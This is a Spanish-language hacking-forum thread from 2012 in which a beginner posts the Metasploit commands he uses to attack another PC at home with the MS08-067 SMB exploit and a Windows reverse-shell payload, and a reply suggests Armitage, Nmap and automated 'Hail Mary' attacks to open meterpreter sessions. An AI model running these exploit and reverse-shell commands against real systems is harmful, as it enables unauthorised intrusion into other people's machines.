elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  PROBLEMA CON BACKTRACK, NO CONECTO A LA MAQUINA OBJETIVO
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PROBLEMA CON BACKTRACK, NO CONECTO A LA MAQUINA OBJETIVO  (Leído 3,388 veces)
pantallanegra

Desconectado Desconectado

Mensajes: 5



Ver Perfil
PROBLEMA CON BACKTRACK, NO CONECTO A LA MAQUINA OBJETIVO
« en: 10 Noviembre 2012, 17:02 pm »

HOLA A TODOS!!

soy novato en el foro como podies comprobar, pues quizas sea una duda tonta, pero no se como solucionarla.

aprendi un poco de backtrack 5 y quiero entrar a otro PC que tengo en casa, parece muy facil como lo hacen en youtube, pero no entiendo el error que me sale.

abro una consola y escribo

msfconsole
set payload windows/shell/reverse_tcp
use exploit/windows/smb/ms08_067?netapi
se carga el exploit...

set lhost pongo mi ip
set rhost pongo mi ip
set rhost pongo la ip del PC al que quiero ingresar

show options

exploit.

despues de ello me sale unos asteriscos azules y uno rojo que dice *no matching target*
y se cierra la conexion.

PD cambio al puerto 445, porque sino no me sale mi eso,
no se que pongo mal...
alguna ayuda??? muchas gracias
En línea

ZxXxA

Desconectado Desconectado

Mensajes: 2


Una vulnerabilidad es tan limitada como tu quieras


Ver Perfil
Re: PROBLEMA CON BACKTRACK, NO CONECTO A LA MAQUINA OBJETIVO
« Respuesta #1 en: 15 Noviembre 2012, 22:33 pm »

Buenas colega, es un tanto confuso lo que exponés y casi sin datos. Te recomendaría detectar que SO tiene el "objetivo", ya que la tarjeta a la que le apuntás estás forzando un exploit (ms08_067?netapi) al protocolo smb. Esa maquina objetivo estará compartiendo recursos? Te aconsejo prudencia y no lanzar exploits por poseer los scripts.  Un buen abordaje al pentesting LAN podría ser con Armitage, si te interesa la plataforma Metasploit Frameworker. En esa UI seguro que podrás detectar cn NMAP o importando scan´s xml... De ahí para adelante, con un ataque hail mary podés detectar posibles vulnerabilidades y activar sesiones meterpreter de forma automática en un entorno más "amigable" si así lo necesitas.

Bendiciones bro, JahGuía♫
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines